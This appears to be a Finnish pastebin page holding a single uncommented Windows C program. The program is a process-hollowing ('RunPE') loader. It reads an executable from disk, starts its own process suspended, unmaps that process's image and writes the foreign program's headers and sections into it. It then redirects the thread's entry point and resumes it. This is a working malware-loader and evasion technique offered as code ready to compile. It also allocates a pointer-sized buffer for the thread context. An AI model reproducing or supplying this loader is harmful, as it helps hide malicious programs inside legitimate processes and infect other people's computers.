Paste #f6B -- näytä pelkkänä tekstinä -- uusi tämän pohjalta
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 | #include <windows.h> #include <stdio.h> typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress); LPVOID FileToMem(LPCSTR szFileName) { HANDLE hFile; DWORD dwRead; DWORD dwSize; LPVOID pBuffer = NULL; hFile = CreateFileA(szFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); if (hFile) { dwSize = GetFileSize(hFile, NULL); if (dwSize > 0) { pBuffer = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE); if (pBuffer) { SetFilePointer(hFile, 0, NULL, FILE_BEGIN); ReadFile(hFile, pBuffer, dwSize, &dwRead, NULL); } } CloseHandle(hFile); } return pBuffer; } void ExecFile(LPSTR szFilePath, LPVOID pFile) { PIMAGE_DOS_HEADER IDH; PIMAGE_NT_HEADERS INH; PIMAGE_SECTION_HEADER ISH; PROCESS_INFORMATION PI; STARTUPINFOA SI; PCONTEXT CTX; PDWORD dwImageBase; NtUnmapViewOfSection xNtUnmapViewOfSection; LPVOID pImageBase; int Count; IDH = (PIMAGE_DOS_HEADER)pFile; if (IDH->e_magic == IMAGE_DOS_SIGNATURE) { INH = (PIMAGE_NT_HEADERS)((DWORD)pFile + IDH->e_lfanew); if (INH->Signature == IMAGE_NT_SIGNATURE) { char buf[MAX_PATH*2+1]; RtlZeroMemory(&SI, sizeof(SI)); RtlZeroMemory(&PI, sizeof(PI)); sprintf(buf, "%s -arg1 -arg2", szFilePath); if (CreateProcessA(NULL, buf, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) { CTX = (PCONTEXT)VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE); CTX->ContextFlags = CONTEXT_FULL; if (GetThreadContext(PI.hThread, (LPCONTEXT)CTX)) { ReadProcessMemory(PI.hProcess, (LPCVOID)(CTX->Ebx + 8), (LPVOID)&dwImageBase, 4, NULL); if ((DWORD)dwImageBase == INH->OptionalHeader.ImageBase) { xNtUnmapViewOfSection = (NtUnmapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection")); xNtUnmapViewOfSection(PI.hProcess, (PVOID)dwImageBase); } pImageBase = VirtualAllocEx(PI.hProcess, (LPVOID)INH->OptionalHeader.ImageBase, INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE); if (pImageBase) { WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL); for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++) { ISH = (PIMAGE_SECTION_HEADER)((DWORD)pFile + IDH->e_lfanew + 248 + (Count * 40)); WriteProcessMemory(PI.hProcess, (LPVOID)((DWORD)pImageBase + ISH->VirtualAddress), (LPVOID)((DWORD)pFile + ISH->PointerToRawData), ISH->SizeOfRawData, NULL); } WriteProcessMemory(PI.hProcess, (LPVOID)(CTX->Ebx + 8), (LPVOID)&INH->OptionalHeader.ImageBase, 4, NULL); CTX->Eax = (DWORD)pImageBase + INH->OptionalHeader.AddressOfEntryPoint; SetThreadContext(PI.hThread, (LPCONTEXT)CTX); ResumeThread(PI.hThread); } } } } } VirtualFree(pFile, 0, MEM_RELEASE); } int main() { LPVOID pFile; TCHAR szFilePath[1024]; pFile = FileToMem("tiedosto.exe"); if (pFile) { GetModuleFileNameA(0, (LPSTR)szFilePath, 1024); ExecFile((LPSTR)szFilePath, pFile); } Sleep(INFINITE); return 0; } |